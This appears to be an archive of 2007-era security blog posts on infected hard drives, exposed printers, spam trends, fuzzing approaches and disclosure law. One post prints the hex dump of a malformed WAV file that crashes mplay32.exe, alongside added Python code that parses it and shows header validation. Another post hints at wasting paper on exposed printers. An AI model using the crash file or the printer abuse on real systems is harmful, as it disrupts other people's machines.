Another case of the infected HD

A second case of malware-infected hard drives has been discovered, the second time this has happened in 4 months. The drives are part of “about 1,800 brand new 300-GB or 500-GB external hard drives made for Maxtor in Thailand” and ship with an autorun.inf file that is executed as soon as the disk is plugged into a Windows computer.

More details on the background can be found here, and a bit more on the origin can be read here.

In the old days this wouldn’t have happened, as disks shipped only “factory formatted”: you had to low-level format them, or at least partition them, before you could use them, so they were neither pre-formatted nor carrying any data.
P.S. Of course Windows is the only operating system that will get infected; Linux or MacOS won’t care about the presence of the autorun.inf file (or the ghost.pif file that is launched by it).


Prevent paper-waste

I have noticed that a few people have been careless enough to leave the HTTP interface of their HP LaserJet (other models may be relevant too) open to the Internet. Even though most of the functionality is disabled, you can still screw around with it by asking it to print the font list, which isn’t a total waste :) of paper, unless you do this repeatedly until the printer runs out of paper.

I would recommend NOT allowing your printers to be visible from the Internet.

(BTW: I found 20 such devices open, but I guess a better Google query could find more)


PCM 0day (Divide by Zero)

The debate about the term “zero days” is not directly related to this PCM vulnerability I am about to reveal, but as this vulnerability is not publicly documented, as far as I know, I will call it a 0day.

The vulnerability allows you to crash mplay32.exe, which for some reason is still shipped with Windows up to Windows Server 2003 (maybe also Vista, can someone confirm?). This low-quality, feature-lacking (software-wise) player contains a bug where a malformed PCM (WAV) file makes it divide a number by zero as it processes the header. The file that triggers it, as a hex dump:
00000000  52 49 46 46 24 00 00 1a 57 41 56 45 66 6d 74 20  |RIFF$...WAVEfmt |
00000010  10 00 00 00 01 00 02 00 44 ac 00 00 88 58 01 00  |........D....X..|
00000020  00 00 10 00 64 61 74 61 00 00 00 1a 00 00 24 17  |....data......$.|
00000030  1e f3 3c 13 3c 14 16 f9 18 f9 34 e7 23 a6 3c f2  |..<.<.....4.#.<.|
00000040  24 f2 11 ce 1a 0d                                |$.....|
Is this vulnerability interesting? Not really: mplay32.exe is no longer the default player (unless you are still in the stone age, i.e. have never upgraded your system or Internet Explorer), and it allows you to do nothing but crash the player.

If someone can find out more about this issue, I will be happy to hear.

BTW: This PCM vulnerability was discovered by beSTORM’s PCM (WAV) fuzzing module, which was run against mplay32.exe.
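Added example (not code from the original post, and not beSTORM’s module): a Python parser for the RIFF/WAVE header in the hex dump above, with the arithmetic a header-trusting player does beside a version that cross-checks the fields first. The post does not say which field mplay32.exe divides by; nBlockAlign is 0x0000 in the dump and is the natural divisor in any frame-count or seek computation, so the example treats it as the trigger. The dump has other inconsistencies too: nAvgBytesPerSec (88200) does not match 2 channels x 16 bits x 44100 Hz, and both the RIFF and data chunk sizes claim about 436 MB for a 70-byte file. The make_pcm_wave helper and the input it builds are constructed here for comparison.

```python
"""Parse the malformed WAV from the hex dump and show the divide-by-zero path.
Added example, not the original post's or beSTORM's code."""
import struct

# The 70 bytes of the hex dump above, transcribed verbatim.
MALFORMED_WAV = bytes.fromhex(
    "52 49 46 46 24 00 00 1a 57 41 56 45 66 6d 74 20"
    "10 00 00 00 01 00 02 00 44 ac 00 00 88 58 01 00"
    "00 00 10 00 64 61 74 61 00 00 00 1a 00 00 24 17"
    "1e f3 3c 13 3c 14 16 f9 18 f9 34 e7 23 a6 3c f2"
    "24 f2 11 ce 1a 0d"
)

FMT_OFFSET = 12          # "fmt " chunk header follows the 12-byte RIFF/WAVE header
FMT_FIELDS = "<HHIIHH"   # wFormatTag, nChannels, nSamplesPerSec, nAvgBytesPerSec,
                         # nBlockAlign, wBitsPerSample (all little-endian)


def parse_wave_header(data):
    """Decode the canonical RIFF -> fmt -> data layout (the layout of the sample).
    Only the structure is checked here; field values are validated separately."""
    if len(data) < FMT_OFFSET + 8:
        raise ValueError("truncated RIFF header")
    riff, riff_size, wave = struct.unpack_from("<4sI4s", data, 0)
    if riff != b"RIFF" or wave != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    fmt_id, fmt_size = struct.unpack_from("<4sI", data, FMT_OFFSET)
    fields_at = FMT_OFFSET + 8
    data_at = fields_at + fmt_size
    if fmt_id != b"fmt " or fmt_size < 16 or len(data) < data_at + 8:
        raise ValueError("bad or truncated fmt chunk")
    (audio_format, channels, sample_rate, byte_rate,
     block_align, bits_per_sample) = struct.unpack_from(FMT_FIELDS, data, fields_at)
    data_id, data_size = struct.unpack_from("<4sI", data, data_at)
    if data_id != b"data":
        raise ValueError("expected a data chunk after fmt")
    return {
        "riff_size": riff_size, "audio_format": audio_format,
        "channels": channels, "sample_rate": sample_rate,
        "byte_rate": byte_rate, "block_align": block_align,
        "bits_per_sample": bits_per_sample, "data_size": data_size,
        "payload_offset": data_at + 8,
    }


def naive_frame_count(data):
    """What a player that trusts the header does: frames = data bytes / nBlockAlign.
    With nBlockAlign == 0 this is the divide by zero (a ZeroDivisionError here,
    an integer-divide fault in native code)."""
    hdr = parse_wave_header(data)
    return hdr["data_size"] // hdr["block_align"]


def crashes_naive_player(data):
    """True if the header-trusting arithmetic faults on this input."""
    try:
        naive_frame_count(data)
    except ZeroDivisionError:
        return True
    return False


def header_problems(data):
    """Cross-check the fmt fields against each other and the file length.
    Returns the names of inconsistent fields; an empty list means the header is sane."""
    hdr = parse_wave_header(data)
    problems = []
    if hdr["audio_format"] != 1:                      # 1 == WAVE_FORMAT_PCM
        problems.append("audio_format")
    if hdr["channels"] == 0 or hdr["bits_per_sample"] not in (8, 16, 24, 32):
        problems.append("channels/bits")
    expected_align = hdr["channels"] * hdr["bits_per_sample"] // 8
    if expected_align == 0 or hdr["block_align"] != expected_align:
        problems.append("block_align")
    if hdr["byte_rate"] != hdr["sample_rate"] * expected_align:
        problems.append("byte_rate")
    if hdr["riff_size"] != len(data) - 8:
        problems.append("riff_size")
    if hdr["data_size"] > len(data) - hdr["payload_offset"]:
        problems.append("data_size")
    return problems


def safe_frame_count(data):
    """Hardened version: refuse the file unless the header is self-consistent."""
    problems = header_problems(data)
    if problems:
        raise ValueError("rejecting WAV, inconsistent header: " + ", ".join(problems))
    hdr = parse_wave_header(data)
    return hdr["data_size"] // hdr["block_align"]


def make_pcm_wave(channels, sample_rate, bits_per_sample, payload):
    """Build a well-formed PCM WAV (constructed input) for comparison."""
    block_align = channels * bits_per_sample // 8
    fmt = struct.pack(FMT_FIELDS, 1, channels, sample_rate,
                      sample_rate * block_align, block_align, bits_per_sample)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(payload)) + payload)
    return b"RIFF" + struct.pack("<I", len(body)) + body


if __name__ == "__main__":
    hdr = parse_wave_header(MALFORMED_WAV)
    print("nBlockAlign =", hdr["block_align"], "problems:", header_problems(MALFORMED_WAV))
    print("naive player divides by zero:", crashes_naive_player(MALFORMED_WAV))
```

Run against the dump, header_problems() reports four inconsistent fields and crashes_naive_player() is True; against a file built by make_pcm_wave() it reports nothing and safe_frame_count() returns the frame count. A player that validates nBlockAlign (and the byte rate and chunk sizes) against the other header fields before doing arithmetic on them never reaches the division.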


IMF going to be boring this year

The IMF (IT-Incident Management & IT-Forensics conference) is going to be boring this year, and I am not saying this because I wasn’t invited (hint :) ); it’s because Germany has recently passed a law that forbids German citizens to research, discuss or disclose security problems.

This makes it illegal for German citizens to participate in the conference, and possibly makes the guys organizing it act illegally.

The only ray of light here is the fact that RUS-CERT are the guys behind it, and they might be connected high enough to avoid prosecution, hopefully :) .


Buy stuff from spam mail

Finally, after years of receiving it, I tried to buy something out of the spam I got, but damn it is difficult, and who is to blame? The spam killers, filters, finders and removers: because of them I can no longer read what the spammer is actually trying to sell me :) . Even worse, when I do call the guy up he is so amazed to hear someone call him that he asks me to call again as he is in his car. Kudos to lev here :) .

Here is a sample of what I mean:

Subject: The MFC library shipping with Visual C++ 4.


u){e} [N](e)[w][s] To I^mpact {C}{V}
C^hina You.TV {C}{r}

Sym*bol: [C]{T}[V]
We (a)(v) alre-ady {s}[e]{n} CYT+V’s m,arket i+mpact befor#e climbi_n.g to {o}[v][r] $2^.00 {w}{i}(t){h} (n)[e][s]< .>
P^ress Relea`se:
C-hina YouTV’_s Cn^Boo {e} (S){i}[t][e] R+anks [N][o]< .>[1] on M.icr*osoft {i}{v}[e] S+earch E-ngine
CnBo*o Traff.ic Increa,se*s [4]<9>< %> {O}[v] (T)(o) M+onths
{R}[a][d] [t][h](e), th_ink a*bout {t}(h)(e) impa`ct, and

on {h}{i}(s) f+irst thin`g Tomo#r+row m^*orning! $0*.42 is a (g)(i)[f][t] at (t)[h]{s} pr_#ice…..
Do (y)[o][u] homew+or-k (n)(d) w_atch (t){h}{i}(s) tra*de Mo,nday mo,rning.

What is this? :P I can’t read this! Even if I tried, I wouldn’t spend so much time trying to read it, as I don’t spend much time reading other types of perfectly legal advertisements either :P .


ZZZ of the month

This has to be the ZZZest (sleepiest, for those who didn’t get the idea) post of the month: a guy called Hamachiya found a vulnerability that crashes IE 7 and IE 6. No big news here, aren’t there a few, or even a few dozen, such vulnerabilities already? Still, for no obvious reason other than the fact that he wrote it in Japanese, it got Slashdot headlines.

Am I missing something or is this part of the “no-news week, therefore we take anything that looks remotely interesting”?


Intel’s vPro ad is here, safe at last

Judging from this ad, life is good: before, we had a lot of security issues; now, with hardware on our side of the battle for complete security, everything is ok :)


DOC spam

Just weeks after we started getting PDF spam, this morning I received my very first DOC spam. The document talks about the usual “I am Barrister Musa Adams a Solicitor. I am the Personal Attorney to MR. Harry Edward Cook a national of your country, who used to work with CADBURY NIGERIA LIMITED, on the 21st of April 2004, my client, his wife and their three children were involved in a car accident along Shagamu Lagos Express Road.”, which makes it very uninteresting, but unlike “regular” (non-DOC) spam of this sort it doesn’t get filtered, as documents aren’t currently being scanned for spam.

Now that we are done with PDF and DOC, what is left? :) RTF?


Neo1973 breaks the last boundary to GSM fuzzing

With the new mobile phone by Neo Advanced I no longer see anything stopping people from doing GSM fuzzing (cheaply), or even attacking the GSM network and any infrastructure located on it. Until recently this kind of testing required (very) expensive hardware; now the Linux-based phone should solve that.

Update 1: It appears that the GSM drivers aren’t open source, so they cannot easily be used to fuzz, but if they aren’t “encrypted/protected” maybe you can use beSTORM’s API fuzzing?

Update 2: I mistakenly gave credit to OpenMoko instead of to the phone in the title.


Flashback – Virtual Sex with Commwarrior

When I first read this post I must confess I was intrigued to read more about what Virtual Sex has to do with Commwarrior. It sounds too good to be true; for a second there I thought it was all about how people were sending each other some form of porn on their cell phones which gets their phone infected, and why wasn’t I receiving them? :)

But as I read on, I understood that “Sex sells while Security blows” (not literally… this is a site for everyone, not just adults). In any case, happy birthday, you are now two years old!


PDF spam

Lately I have been getting more and more PDF-based spam; the PDF itself appears to be just a cover for the normal image spam. The idea, I believe, is that PDF is not inspected by most spam filtering agents and is not regarded by spam filtering as a “score giver” (i.e. something that makes the email look more spammish than others).

BTW: At first glance I thought it was malware or an exploit using PDF as its carrier, but after a day’s work investigating and probing the file with various (non-standard) PDF readers, I concluded that it had nothing to do with malware or an exploit :) kudos to me :P


Presenting vulnerabilities and patches as IP

A company called Intellectual Weapons wants to sell your vulnerabilities, and the patches that fix them, for a lot of money. To do that they want to patent any vulnerability-and-patch combination they get their hands on, so that anyone using that vulnerability or patch will be required to pay them.

This sounds like a spinoff from the idea behind iDEFENSE.

But it sounds a lot worse, as they plan on suing anyone patching their system without paying them royalties. I can’t emphasize enough how bad this sounds; it reminds me of other bad ideas, for example BlueSecurity’s approach of fighting spam by attacking the spammers.


FuzzGuru’s approach to fuzzing

Recently I saw a lecture by John of Microsoft about their FuzzGuru framework; apparently their approach to fuzzing is tight integration with code coverage tools. Similarly, a recently published paper by Microsoft Research, Automated Whitebox Fuzz Testing, shows that this is in fact Microsoft’s approach to fuzzing.

Though this approach seems to give Microsoft good results, I am not sure it is a good approach for the majority of people who develop software, as in the security testing phase there is usually little chance that the source code will be available for code coverage measurement.

Some would think that binary code coverage might work as well. I disagree: generic code coverage will confuse the fuzzer, as it would not concentrate on the parser part of the program, which is what our fuzzer needs to test.

We’ve been toying with the idea of implementing both source code coverage and binary code coverage in beSTORM but I’m not sure I’m convinced yet that the code coverage approach is beneficial.
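To make concrete what “integration with code coverage tools” buys a fuzzer, here is an added example, not FuzzGuru’s code, not the Microsoft Research paper’s, and not beSTORM’s: a minimal coverage-guided mutation fuzzer in Python run against a constructed toy parser. The target is instrumented by hand (COVERAGE.add() standing in for the compiler or binary instrumentation a real tool uses), and the crash it hides is a divide by zero on a block-align byte, echoing the mplay32.exe bug above. The same mutator is run without feedback for comparison; every name, value and budget here is this example’s own assumption.

```python
"""Minimal coverage-guided mutation fuzzer versus blind mutation.
Added example; the target, instrumentation and mutator are all constructed."""
import random

COVERAGE = set()   # edge ids hit by the current execution (hand instrumentation)


def toy_parser(data):
    """Constructed target: a 4-byte magic, then a block-align byte used as a
    divisor, echoing the PCM player bug above."""
    COVERAGE.add("enter")
    if len(data) < 6:
        COVERAGE.add("short")
        return None
    for i, want in enumerate(b"FUZZ"):
        if data[i] != want:
            COVERAGE.add("bad%d" % i)
            return None
        COVERAGE.add("magic%d" % i)
    COVERAGE.add("header_ok")
    return data[5] // data[4]        # ZeroDivisionError when the divisor byte is 0


INTERESTING = (0, 1, 0x7f, 0x80, 0xff)   # boundary values every fuzzer tries


def mutate(rng, parent):
    """Single-byte mutation: a random byte, or one of the interesting values."""
    child = bytearray(parent)
    pos = rng.randrange(len(child))
    child[pos] = rng.choice(INTERESTING) if rng.random() < 0.25 else rng.randrange(256)
    return bytes(child)


def run_target(data):
    """Execute the target once; return (edges hit, exception or None)."""
    COVERAGE.clear()
    try:
        toy_parser(data)
    except ZeroDivisionError as exc:
        return frozenset(COVERAGE), exc
    return frozenset(COVERAGE), None


def fuzz(seed_input, budget, guided, seed=1):
    """Mutation fuzzing loop.  guided=True keeps every input that reaches a new
    edge and mutates from that corpus (coverage feedback); guided=False always
    mutates the original seed input, i.e. no feedback at all."""
    rng = random.Random(seed)
    corpus = [seed_input]
    edges, _ = run_target(seed_input)
    seen = set(edges)
    for iteration in range(1, budget + 1):
        parent = rng.choice(corpus) if guided else seed_input
        child = mutate(rng, parent)
        edges, crash = run_target(child)
        if crash is not None:
            return {"crash": child, "iterations": iteration,
                    "edges": len(seen), "corpus": len(corpus)}
        if guided and not edges <= seen:   # new coverage: keep it for further mutation
            seen |= edges
            corpus.append(child)
    return {"crash": None, "iterations": budget,
            "edges": len(seen), "corpus": len(corpus)}


if __name__ == "__main__":
    for guided in (True, False):
        result = fuzz(b"AAAAAA", budget=200_000, guided=guided)
        print("guided" if guided else "blind ", result)
```

With a fixed seed the guided run reaches the crash typically within a few tens of thousands of executions, adding one corpus entry per magic byte it gets past, while the blind run exhausts its 200,000-execution budget without ever getting beyond the first magic check, because a single-byte mutation of the seed can never produce the full magic. Whether that feedback is worth the instrumentation effort on a closed binary, as the post asks, is a separate question; this only shows what the feedback does.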


Malware went commercial

In a post in the Washington Post, Brian Krebs describes how virus (malware) makers have started to spend cash buying sponsored links for high-profile keywords, which are regularly searched for by poorly patched people, so that they can infect them with malware.

One such high-profile keyword is the BBB, the Better Business Bureau, which, as you would guess, most average Joes would look for and visit, while buying something like Slashdot won’t pay off :) .

This is of course an interesting move, though not so unexpected. I can see a “legit company” coming soon: a malware distribution organization with an R&D department (create new malware and find new vulnerabilities), Marketing (buy high-profile keywords, or generally get people interested in your malware-infected web site) and Sales (sell botnets and infected/hacked computers for money).


extractQuotedChar() function blamed for RPC vulnerability

According to the exploit released by H.D. Moore’s Metasploit project, the RPC DNS server vulnerability is caused by the extractQuotedChar() function. No additional details on what the purpose of this function is.


When is a security researcher (white hacker) a journalist?

One of the issues raised here at Malware’07 is whether a security researcher, white hacker or ethical hacker, can be considered a journalist.

The analogy is with a journalist who uncovers fraud, misuse, bad quality, etc. in products (one example is poisonous cat food) and informs the public: is he liable to being sued for damages by the company making the food?

In the same sense, a security researcher who finds a vulnerability in Windows Vista and reports it to the public: is he liable to being sued by Microsoft for damages caused by this vulnerability?

The debate is on. One thing is for sure: until it reaches the courts, no one will know whether the researcher is protected by the same laws that protect the journalist.